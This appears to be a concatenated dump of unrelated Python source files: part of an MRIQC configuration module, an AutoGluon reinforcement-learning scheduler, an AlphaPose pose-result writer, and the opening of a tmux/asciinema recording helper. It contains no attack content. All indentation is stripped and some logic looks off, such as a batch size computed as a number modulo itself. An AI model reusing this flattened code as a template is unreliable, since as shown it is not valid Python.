sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any(
(
"+" in __version__,
__version__.endswith(".dirty"),
os.getenv("MRIQC_DEV", "0").lower() in ("1", "on", "true", "y", "yes"),
)
):
os.environ["PYTHONWARNINGS"] = "ignore"
logging.addLevelName(25, "IMPORTANT") # Add a new level between INFO and WARNING
logging.addLevelName(15, "VERBOSE") # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
DSA_MESSAGE = """\
IMPORTANT: Anonymized quality metrics (IQMs) will be submitted to MRIQC's metrics \
repository. \
Submission of IQMs can be disabled using the ``--no-sub`` argument. \
Please visit https://mriqc.readthedocs.io/en/latest/dsa.html to revise MRIQC's \
Data Sharing Agreement."""
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv("IS_DOCKER_8395080871"):
_exec_env = "singularity"
_cgroup = Path("/proc/1/cgroup")
if _cgroup.exists() and "docker" in _cgroup.read_text():
_docker_ver = os.getenv("DOCKER_VERSION_8395080871")
_exec_env = "docker"
del _cgroup
_templateflow_home = Path(
os.getenv(
"TEMPLATEFLOW_HOME",
os.path.join(os.getenv("HOME"), ".cache", "templateflow"),
)
)
try:
from psutil import virtual_memory
_free_mem_at_start = round(virtual_memory().free / 1024**3, 1)
except Exception:
_free_mem_at_start = None
_oc_limit = "n/a"
_oc_policy = "n/a"
try:
# Memory policy may have a large effect on types of errors experienced
_proc_oc_path = Path("/proc/sys/vm/overcommit_memory")
if _proc_oc_path.exists():
_oc_policy = {"0": "heuristic", "1": "always", "2": "never"}.get(
_proc_oc_path.read_text().strip(), "unknown"
)
if _oc_policy != "never":
_proc_oc_kbytes = Path("/proc/sys/vm/overcommit_kbytes")
if _proc_oc_kbytes.exists():
_oc_limit = _proc_oc_kbytes.read_text().strip()
if (
_oc_limit in ("0", "n/a")
and Path("/proc/sys/vm/overcommit_ratio").exists()
):
_oc_limit = "{}%".format(
Path("/proc/sys/vm/overcommit_ratio").read_text().strip()
)
except Exception:
pass
_memory_gb = None
try:
if "linux" in sys.platform:
with open("/proc/meminfo", "r") as f_in:
_meminfo_lines = f_in.readlines()
_mem_total_line = [line for line in _meminfo_lines if "MemTotal" in line][0]
_mem_total = float(_mem_total_line.split()[1])
_memory_gb = _mem_total / (1024.0**2)
elif "darwin" in sys.platform:
_mem_str = os.popen("sysctl hw.memsize").read().strip().split(" ")[-1]
_memory_gb = float(_mem_str) / (1024.0**3)
except Exception:
pass
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError("Configuration type is not instantiable.")
@classmethod
def load(cls, settings, init=True):
"""Store settings from a dictionary."""
for k, v in settings.items():
if v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
continue
if hasattr(cls, k):
setattr(cls, k, v)
if init:
try:
cls.init()
except AttributeError:
pass
@classmethod
def get(cls):
"""Return defined settings."""
out = {}
for k, v in cls.__dict__.items():
if k.startswith("_") or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
out[k] = v
return out
class environment(_Config):
"""
Read-only options regarding the platform and environment.
Crawls runtime descriptive settings (e.g., default FreeSurfer license,
execution environment, nipype and *MRIQC* versions, etc.).
The ``environment`` section is not loaded in from file,
only written out when settings are exported.
This config section is useful when reporting issues,
and these variables are tracked whenever the user does not
opt-out using the ``--notrack`` argument.
"""
cpu_count = os.cpu_count()
"""Number of available CPUs."""
exec_docker_version = _docker_ver
"""Version of Docker Engine."""
exec_env = _exec_env
"""A string representing the execution platform."""
free_mem = _free_mem_at_start
"""Free memory at start."""
overcommit_policy = _oc_policy
"""Linux's kernel virtual memory overcommit policy."""
overcommit_limit = _oc_limit
"""Linux's kernel virtual memory overcommit limits."""
nipype_version = get_version("nipype")
"""Nipype's current version."""
templateflow_version = get_version("templateflow")
"""The TemplateFlow client version installed."""
total_memory = _memory_gb
"""Total memory available, in GB."""
version = __version__
"""*MRIQC*'s version."""
_pre_mriqc = _pre_exec_env
"""Environment variables before MRIQC's execution."""
class nipype(_Config):
"""Nipype settings."""
crashfile_format = "txt"
"""The file format for crashfiles, either text or pickle."""
get_linked_libs = False
"""Run NiPype's tool to enlist linked libraries for every interface."""
local_hash_check = True
"""Check if interface is cached locally before executing."""
memory_gb = None
"""Estimation in GB of the RAM this workflow can allocate at any given time."""
nprocs = os.cpu_count()
"""Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
omp_nthreads = _default_omp_threads
"""Number of CPUs a single process can access for multithreaded execution."""
plugin = "MultiProc"
"""NiPype's execution plugin."""
plugin_args = {
"maxtasksperchild": 1,
"raise_insufficient": False,
}
"""Settings for NiPype's execution plugin."""
remove_node_directories = False
"""Remove directories whose outputs have already been used up."""
resource_monitor = False
"""Enable resource monitor."""
stop_on_first_crash = True
"""Whether the workflow should stop or continue after the first error."""
@classmethod
def get_plugin(cls):
"""Format a dictionary for Nipype consumption."""
out = {
"plugin": cls.plugin,
"plugin_args": cls.plugin_args,
}
if cls.plugin in ("MultiProc", "LegacyMultiProc"):
out["plugin_args"]["n_procs"] = int(cls.nprocs)
if cls.memory_gb:
out["plugin_args"]["memory_gb"] = float(cls.memory_gb)
return out
@classmethod
def init(cls):
"""Set NiPype configurations."""
from nipype import config as ncfg
# Nipype config (logs and execution)
ncfg.update_config(
{
"execution": {
"crashdump_dir": str(execution.log_dir),
"crashfile_format": cls.crashfile_format,
"get_linked_libs": cls.get_linked_libs,
"stop_on_first_crash": cls.stop_on_first_crash,
}
}
)
class execution(_Config):
"""Configure run-level settings."""
ants_float = False
"""Use float number precision for ANTs computations."""
bids_dir = None
"""An existing path to the dataset, which must be BIDS-compliant."""
bids_database_dir = None
"""Path to the directory containing SQLite database indices for the input BIDS dataset."""
bids_description_hash = None
"""Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
cwd = os.getcwd()
"""Current working directory."""
debug = False
"""Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
dry_run = False
"""Just test, do not run."""
dsname = "<unset>"
"""A dataset name used when generating files from the rating widget."""
echo_id = None
"""Select a particular echo for multi-echo EPI datasets."""
float32 = True
"""Cast the input data to float32 if it's represented whith higher precision."""
layout = None
"""A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
log_dir = None
"""The path to a directory that contains execution logs."""
log_level = 25
"""Output verbosity."""
modalities = None
"""Filter input dataset by MRI type."""
no_sub = False
"""Turn off submission of anonymized quality metrics to Web API."""
output_dir = None
"""Folder where derivatives will be stored."""
participant_label = None
"""List of participant identifiers that are to be preprocessed."""
pdb = False
"""Drop into PDB when exceptions are encountered."""
reports_only = False
"""Only build the reports, based on the reportlets found in a cached working directory."""
resource_monitor = False
"""Enable resource monitor."""
run_id = None
"""Filter input dataset by run identifier."""
run_uuid = "%s_%s" % (strftime("%Y%m%d-%H%M%S"), uuid4())
"""Unique identifier of this particular run."""
session_id = None
"""Filter input dataset by session identifier."""
task_id = None
"""Select a particular task from all available in the dataset."""
templateflow_home = _templateflow_home
"""The root folder of the TemplateFlow client."""
upload_strict = False
"""Workflow will crash if upload is not successful."""
verbose_reports = False
"""Generate extended reports."""
webapi_url = "https://mriqc.nimh.nih.gov/api/v1"
"""IP address where the MRIQC WebAPI is listening."""
webapi_port = None
"""port where the MRIQC WebAPI is listening."""
work_dir = Path("work").absolute()
"""Path to a working directory where intermediate results will be available."""
write_graph = False
"""Write out the computational graph corresponding to the planned preprocessing."""
_layout = None
_paths = (
"anat_derivatives",
"bids_dir",
"bids_database_dir",
"fs_license_file",
"fs_subjects_dir",
"layout",
"log_dir",
"output_dir",
"templateflow_home",
"work_dir",
)
@classmethod
def init(cls):
"""Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
if cls._layout is None:
import re
from bids.layout.index import BIDSLayoutIndexer
from bids.layout import BIDSLayout
_db_path = cls.bids_database_dir or (
cls.work_dir / cls.run_uuid / "bids_db"
)
_db_path.mkdir(exist_ok=True, parents=True)
# Recommended after PyBIDS 12.1
_indexer = BIDSLayoutIndexer(
validate=False,
ignore=(
"code",
"stimuli",
"sourcedata",
"models",
"derivatives",
"scripts",
re.compile(r"^\."),
# Exclude modalities and contrasts ignored by MRIQC (doesn't know how to QC)
re.compile(
r"sub-[a-zA-Z0-9]+(/ses-[a-zA-Z0-9]+)?/(dwi|fmap|perf)/"
),
re.compile(
r"sub-[a-zA-Z0-9]+(/ses-[a-zA-Z0-9]+)?/anat/.*_"
r"(PDw|T2starw|FLAIR|inplaneT1|inplaneT2|PDT2|angio|T2star"
r"|FLASH|PD|T1map|T2map|T2starmap|R1map|R2map|R2starmap|PDmap"
r"|MTRmap|MTsat|UNIT1|T1rho|MWFmap|MTVmap|PDT2map|Chimap"
r"|S0map|M0map|defacemask|MESE|MEGRE|VFA|IRT1|MP2RAGE|MPM|MTS|MTR)\."
),
re.compile(
r"sub-[a-zA-Z0-9]+(/ses-[a-zA-Z0-9]+)?/func/.*"
r"_(cbv|sbref|phase|events|physio|stim)\."
),
),
)
cls._layout = BIDSLayout(
str(cls.bids_dir),
database_path=_db_path,
reset_database=cls.bids_database_dir is None,
indexer=_indexer,
)
cls.bids_database_dir = _db_path
cls.layout = cls._layout
# These variables are not necessary anymore
del _exec_env
del _templateflow_home
del _free_mem_at_start
del _oc_limit
del _oc_policy
class workflow(_Config):
"""Configure the particular execution graph of this workflow."""
analysis_level = ["participant"]
"""Level of analysis."""
biggest_file_gb = 1
"""Size of largest file in GB."""
correct_slice_timing = False
"""Perform slice timing correction."""
deoblique = False
"""Deoblique the functional scans during head motion correction preprocessing."""
despike = False
"""Despike the functional scans during head motion correction preprocessing."""
fd_thres = 0.2
"""Threshold on Framewise Displacement estimates to detect outliers."""
fd_radius = 50
"""Radius in mm. of the sphere for the FD calculation."""
fft_spikes_detector = False
"""Turn on FFT based spike detector (slow)."""
headmask = "BET"
"""Use FSL BET in :py:func:`~mriqc.workflows.anatomical.headmsk_wf`."""
ica = False
"""Run ICA on the raw data and include the components in the individual reports."""
inputs = None
"""List of files to be processed with MRIQC."""
species = "human"
"""Subject species to choose most appropriate template"""
template_id = "MNI152NLin2009cAsym"
"""TemplateFlow ID of template used for the anatomical processing."""
class loggers:
"""Keep loggers easily accessible (see :py:func:`init`)."""
_fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
_datefmt = "%y%m%d-%H:%M:%S"
_init = False
default = logging.getLogger()
"""The root logger."""
cli = logging.getLogger("cli")
"""Command-line interface logging."""
workflow = None
"""NiPype's workflow logger."""
interface = None
"""NiPype's interface logger."""
utils = None
"""NiPype's utils logger."""
@classmethod
def init(cls):
"""
Set the log level, initialize all loggers into :py:class:`loggers`.
* Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
* Add a new sub-logger (``cli``).
* Logger configuration.
"""
if not cls._init:
from nipype import logging as nlogging
from nipype import config as ncfg
cls.workflow = nlogging.getLogger("nipype.workflow")
cls.interface = nlogging.getLogger("nipype.interface")
cls.utils = nlogging.getLogger("nipype.utils")
if not len(cls.cli.handlers):
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(
logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt)
)
cls.cli.addHandler(_handler)
ncfg.update_config(
{
"logging": {
"log_directory": str(execution.log_dir),
"log_to_file": True,
},
}
)
cls._init = True
cls.default.setLevel(execution.log_level)
cls.cli.setLevel(execution.log_level)
cls.interface.setLevel(execution.log_level)
cls.workflow.setLevel(execution.log_level)
cls.utils.setLevel(execution.log_level)
@classmethod
def getLogger(cls, name):
"""Create a new logger."""
retval = getattr(cls, name)
if retval is None:
setattr(cls, name, logging.getLogger(name))
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt))
retval.addHandler(_handler)
retval.setLevel(execution.log_level)
return retval
def from_dict(settings):
"""Read settings from a flat dictionary."""
execution.load(settings)
workflow.load(settings)
nipype.load(settings, init=False)
def load(filename):
"""Load settings from file."""
from toml import loads
filename = Path(filename)
settings = loads(filename.read_text())
for sectionname, configs in settings.items():
if sectionname != "environment":
section = getattr(sys.modules[__name__], sectionname)
section.load(configs)
def get(flat=False):
"""Get config as a dict."""
settings = {
"environment": environment.get(),
"execution": execution.get(),
"workflow": workflow.get(),
"nipype": nipype.get(),
}
if not flat:
return settings
return {
".".join((section, k)): v
for section, configs in settings.items()
for k, v in configs.items()
}
def dumps():
"""Format config into toml."""
from toml import dumps
return dumps(get())
def to_filename(filename):
"""Write settings to file."""
filename = Path(filename)
filename.parent.mkdir(exist_ok=True, parents=True)
filename.write_text(dumps())
def _process_initializer(cwd, omp_nthreads):
"""Initialize the environment of the child process."""
os.chdir(cwd)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["OMP_NUM_THREADS"] = f"{omp_nthreads}"
def restore_env():
"""Restore the original environment."""
for k in os.environ.keys():
del os.environ[k]
for k, v in environment._pre_mriqc.items():
os.environ[k] = v
|
rl_scheduler.py | import os
import json
import time
import pickle
import logging
import threading
import multiprocessing as mp
from collections import OrderedDict
import mxnet as mx
from .resource import DistributedResource
from ..utils import (save, load, mkdir, try_import_mxboard, tqdm)
from ..core import Task
from ..core.decorator import _autogluon_method
from ..searcher import RLSearcher
from .fifo import FIFOScheduler
from .reporter import DistStatusReporter
__all__ = ['RLScheduler']
logger = logging.getLogger(__name__)
class RLScheduler(FIFOScheduler):
r"""Scheduler that uses Reinforcement Learning with a LSTM controller created based on the provided search spaces
Parameters
----------
train_fn : callable
A task launch function for training. Note: please add the `@ag.args` decorater to the original function.
args : object (optional)
Default arguments for launching train_fn.
resource : dict
Computation resources. For example, `{'num_cpus':2, 'num_gpus':1}`
searcher : object (optional)
Autogluon searcher. For example, autogluon.searcher.RandomSearcher
time_attr : str
A training result attr to use for comparing time.
Note that you can pass in something non-temporal such as
`training_epoch` as a measure of progress, the only requirement
is that the attribute should increase monotonically.
reward_attr : str
The training result objective value attribute. As with `time_attr`, this may refer to any objective value.
Stopping procedures will use this attribute.
controller_resource : int
Batch size for training controllers.
dist_ip_addrs : list of str
IP addresses of remote machines.
Examples
--------
>>> import numpy as np
>>> import autogluon as ag
>>>
>>> @ag.args(
... lr=ag.space.Real(1e-3, 1e-2, log=True),
... wd=ag.space.Real(1e-3, 1e-2))
>>> def train_fn(args, reporter):
... print('lr: {}, wd: {}'.format(args.lr, args.wd))
... for e in range(10):
... dummy_accuracy = 1 - np.power(1.8, -np.random.uniform(e, 2*e))
... reporter(epoch=e+1, accuracy=dummy_accuracy, lr=args.lr, wd=args.wd)
...
>>> scheduler = ag.scheduler.RLScheduler(train_fn,
... resource={'num_cpus': 2, 'num_gpus': 0},
... num_trials=20,
... reward_attr='accuracy',
... time_attr='epoch')
>>> scheduler.run()
>>> scheduler.join_jobs()
>>> scheduler.get_training_curves(plot=True)
"""
def __init__(self, train_fn, args=None, resource=None, searcher=None, checkpoint='./exp/checkpoint.ag',
resume=False, num_trials=None, time_attr='epoch', reward_attr='accuracy',
visualizer='none', controller_lr=1e-3, ema_baseline_decay=0.95,
controller_resource={'num_cpus': 0, 'num_gpus': 0},
controller_batch_size=1,
dist_ip_addrs=[], sync=True, **kwargs):
assert isinstance(train_fn, _autogluon_method), 'Please use @ag.args ' + \
'to decorate your training script.'
self.ema_baseline_decay = ema_baseline_decay
self.sync = sync
# create RL searcher/controller
if not isinstance(searcher, RLSearcher):
searcher = RLSearcher(
train_fn.kwspaces, reward_attribute=reward_attr)
super(RLScheduler,self).__init__(
train_fn, train_fn.args, resource, searcher,
checkpoint=checkpoint, resume=False, num_trials=num_trials,
time_attr=time_attr, reward_attr=reward_attr,
visualizer=visualizer, dist_ip_addrs=dist_ip_addrs, **kwargs)
# reserve controller computation resource on master node
master_node = self.remote_manager.get_master_node()
self.controller_resource = DistributedResource(**controller_resource)
assert self.resource_manager.reserve_resource(
master_node, self.controller_resource), 'Not Enough Resource on Master Node' + \
' for Training Controller'
self.controller_ctx = [mx.gpu(i) for i in self.controller_resource.gpu_ids] if \
controller_resource['num_gpus'] > 0 else [mx.cpu()]
# controller setup
self.controller = searcher.controller
self.controller.collect_params().reset_ctx(self.controller_ctx)
self.controller_optimizer = mx.gluon.Trainer(
self.controller.collect_params(), 'adam',
optimizer_params={'learning_rate': controller_lr*controller_batch_size})
self.controller_batch_size = controller_batch_size
self.baseline = None
self.lock = mp.Lock()
# async buffers
if not sync:
self.mp_count = mp.Value('i', 0)
self.mp_seed = mp.Value('i', 0)
self.mp_fail = mp.Value('i', 0)
if resume:
if os.path.isfile(checkpoint):
self.load_state_dict(load(checkpoint))
else:
msg = 'checkpoint path {} is not available for resume.'.format(checkpoint)
logger.exception(msg)
def run(self, **kwargs):
"""Run multiple number of trials
"""
self.num_trials = kwargs.get('num_trials', self.num_trials)
logger.info('Starting Experiments')
logger.info('Num of Finished Tasks is {}'.format(self.num_finished_tasks))
logger.info('Num of Pending Tasks is {}'.format(self.num_trials - self.num_finished_tasks))
if self.sync:
self._run_sync()
else:
self._run_async()
def _run_sync(self):
decay = self.ema_baseline_decay
for i in tqdm(range(self.num_trials // self.controller_batch_size + 1)):
with mx.autograd.record():
# sample controller_batch_size number of configurations
batch_size = self.num_trials % self.num_trials \
if i == self.num_trials // self.controller_batch_size \
else self.controller_batch_size
if batch_size == 0: continue
configs, log_probs, entropies = self.controller.sample(
batch_size, with_details=True)
# schedule the training tasks and gather the reward
rewards = self.sync_schedule_tasks(configs)
# substract baseline
if self.baseline is None:
self.baseline = rewards[0]
avg_rewards = mx.nd.array([reward - self.baseline for reward in rewards],
ctx=self.controller.context)
# EMA baseline
for reward in rewards:
self.baseline = decay * self.baseline + (1 - decay) * reward
# negative policy gradient
log_probs = log_probs.sum(axis=1)
loss = - log_probs * avg_rewards#.reshape(-1, 1)
loss = loss.sum() # or loss.mean()
# update
loss.backward()
self.controller_optimizer.step(batch_size)
logger.debug('controller loss: {}'.format(loss.asscalar()))
def _run_async(self):
def _async_run_trial():
self.mp_count.value += 1
self.mp_seed.value += 1
seed = self.mp_seed.value
mx.random.seed(seed)
with mx.autograd.record():
# sample one configuration
with self.lock:
config, log_prob, entropy = self.controller.sample(with_details=True)
config = config[0]
task = Task(self.train_fn, {'args': self.args, 'config': config},
DistributedResource(**self.resource))
# start training task
reporter = DistStatusReporter(remote=task.resources.node)
task.args['reporter'] = reporter
task_thread = self.add_job(task)
# run reporter
last_result = None
config = task.args['config']
while task_thread.is_alive():
reported_result = reporter.fetch()
if reported_result.get('done', False):
reporter.move_on()
task_thread.join()
break
self._add_training_result(task.task_id, reported_result, task.args['config'])
reporter.move_on()
last_result = reported_result
self.searcher.update(config, **last_result)
reward = last_result[self._reward_attr]
with self.lock:
if self.baseline is None:
self.baseline = reward
avg_reward = mx.nd.array([reward - self.baseline], ctx=self.controller.context)
# negative policy gradient
with self.lock:
loss = -log_prob * avg_reward.reshape(-1, 1)
loss = loss.sum()
# update
print('loss', loss)
with self.lock:
try:
loss.backward()
self.controller_optimizer.step(1)
except Exception:
self.mp_fail.value += 1
logger.warning('Exception during backward {}.'.format(self.mp_fail.value))
self.mp_count.value -= 1
# ema
with self.lock:
decay = self.ema_baseline_decay
self.baseline = decay * self.baseline + (1 - decay) * reward
reporter_threads = []
for i in range(self.num_trials):
while self.mp_count.value >= self.controller_batch_size:
time.sleep(0.2)
#_async_run_trial()
reporter_thread = threading.Thread(target=_async_run_trial)
reporter_thread.start()
reporter_threads.append(reporter_thread)
for p in reporter_threads:
p.join()
def sync_schedule_tasks(self, configs):
rewards = []
results = {}
def _run_reporter(task, task_job, reporter):
last_result = None
config = task.args['config']
while not task_job.done():
reported_result = reporter.fetch()
if 'traceback' in reported_result:
logger.exception(reported_result['traceback'])
reporter.move_on()
break
if reported_result.get('done', False):
reporter.move_on()
break
self._add_training_result(task.task_id, reported_result, task.args['config'])
reporter.move_on()
last_result = reported_result
if last_result is not None:
self.searcher.update(config, **last_result)
with self.lock:
results[pickle.dumps(config)] = \
last_result[self._reward_attr]
# launch the tasks
tasks = []
task_jobs = []
reporter_threads = []
for config in configs:
logger.debug('scheduling config: {}'.format(config))
# create task
task = Task(self.train_fn, {'args': self.args, 'config': config},
DistributedResource(**self.resource))
reporter = DistStatusReporter()
task.args['reporter'] = reporter
task_job = self.add_job(task)
# run reporter
reporter_thread = threading.Thread(target=_run_reporter, args=(task, task_job, reporter))
reporter_thread.start()
tasks.append(task)
task_jobs.append(task_job)
reporter_threads.append(reporter_thread)
for p1, p2 in zip(task_jobs, reporter_threads):
p1.result()
p2.join()
with self.LOCK:
for task in tasks:
self.finished_tasks.append({'TASK_ID': task.task_id,
'Config': task.args['config']})
if self._checkpoint is not None:
logger.debug('Saving Checkerpoint')
self.save()
for config in configs:
rewards.append(results[pickle.dumps(config)])
return rewards
def add_job(self, task, **kwargs):
"""Adding a training task to the scheduler.
Args:
task (:class:`autogluon.scheduler.Task`): a new training task
"""
cls = RLScheduler
cls.resource_manager._request(task.resources)
# main process
job = cls._start_distributed_job(task, cls.resource_manager)
return job
def join_tasks(self):
pass
def state_dict(self, destination=None):
"""Returns a dictionary containing a whole state of the Scheduler
Examples
--------
>>> ag.save(scheduler.state_dict(), 'checkpoint.ag')
"""
if destination is None:
destination = OrderedDict()
destination._metadata = OrderedDict()
logger.debug('\nState_Dict self.finished_tasks: {}'.format(self.finished_tasks))
destination['finished_tasks'] = pickle.dumps(self.finished_tasks)
destination['baseline'] = pickle.dumps(self.baseline)
destination['TASK_ID'] = Task.TASK_ID.value
destination['searcher'] = self.searcher.state_dict()
destination['training_history'] = json.dumps(self.training_history)
if self.visualizer == 'mxboard' or self.visualizer == 'tensorboard':
destination['visualizer'] = json.dumps(self.mxboard._scalar_dict)
return destination
def load_state_dict(self, state_dict):
"""Load from the saved state dict.
Examples
--------
>>> scheduler.load_state_dict(ag.load('checkpoint.ag'))
"""
self.finished_tasks = pickle.loads(state_dict['finished_tasks'])
#self.baseline = pickle.loads(state_dict['baseline'])
Task.set_id(state_dict['TASK_ID'])
self.searcher.load_state_dict(state_dict['searcher'])
self.training_history = json.loads(state_dict['training_history'])
if self.visualizer == 'mxboard' or self.visualizer == 'tensorboard':
self.mxboard._scalar_dict = json.loads(state_dict['visualizer'])
logger.debug('Loading Searcher State {}'.format(self.searcher))
|
writer.py | import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms, write_json
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_flow:
from trackers.PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
final_result = []
norm_type = self.cfg.LOSS.get('NORM_TYPE', None)
hm_size = self.cfg.DATA_PRESET.HEATMAP_SIZE
if self.save_video:
# initialize the file video stream, adapt ouput video resolution to original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
# keep looping infinitelyd
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
if self.save_video:
stream.release()
write_json(final_result, self.opt.outputpath, form=self.opt.format, for_eval=self.opt.eval)
print("Results have been written to json.")
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None or len(boxes) == 0:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
assert hm_data.dim() == 4
#pred = hm_data.cpu().data.numpy()
if hm_data.size()[1] == 136:
self.eval_joints = [*range(0,136)]
elif hm_data.size()[1] == 26:
self.eval_joints = [*range(0,26)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(hm_data[i][self.eval_joints], bbox, hm_shape=hm_size, norm_type=norm_type)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
if not self.opt.pose_track:
boxes, scores, ids, preds_img, preds_scores, pick_ids = \
pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
_result = []
for k in range(len(scores)):
_result.append(
{
'keypoints':preds_img[k],
'kp_score':preds_scores[k],
'proposal_score': torch.mean(preds_scores[k]) + scores[k] + 1.25 * max(preds_scores[k]),
'idx':ids[k],
'box':[boxes[k][0], boxes[k][1], boxes[k][2]-boxes[k][0],boxes[k][3]-boxes[k][1]]
}
)
result = {
'imgname': im_name,
'result': _result
}
if self.opt.pose_flow:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
final_result.append(result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, self.opt)
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
print("im_name.split('/')[-1])",im_name.split('/')[-1])
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name.split('/')[-1]), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
self.result_worker.join()
def terminate(self):
# directly terminate
self.result_worker.terminate()
def clear_queues(self):
self.clear(self.result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def results(self):
# return final result
print(self.final_result)
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
|
clidirector.py | import json
import libtmux
import random
import subprocess
import threading
import time
import typing
class InstructionSpec(typing.NamedTuple):
instruction: str
time_from: float
time_to: float
class CliDirector:
def __init__(self):
self.record_start = None
self.pause_between_keys = 0.2
self.instructions: typing.List[InstructionSpec] = []
def start(self, filename: str, width: int = 0, height: int = 0) -> libtmux.Session:
self.start_session(width, height)
self.start_recording(filename)
return self.tmux_session
def start_session(self, width: int = 0, height: int = 0) -> libtmux.Session:
self.tmux_server = libtmux.Server()
self.tmux_session = self.tmux_server.new_session(session_name="asciinema_recorder", kill_session=True)
self.tmux_pane = self.tmux_session.attached_window.attached_pane
self.tmux_version = self.tmux_pane.display_message("#{version}", True)
if width and height:
self.resize_window(width, height)
self.pause(3)
return self.tmux_session
def start_recording(self, filename: str) -> None:
self.asciinema_proc = subprocess.Popen([
"asciinema", "rec", "-y", "--overwrite", "-c", "tmux attach -t asciinema_recorder", filename])
self.pause(1.5)
self.record_start = time.time()
def resize_window(self, width: int, height: int) -> None:
subprocess.Popen(["resize", "-s", str(height), str(width)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def end(self) -> None:
self.end_recording()
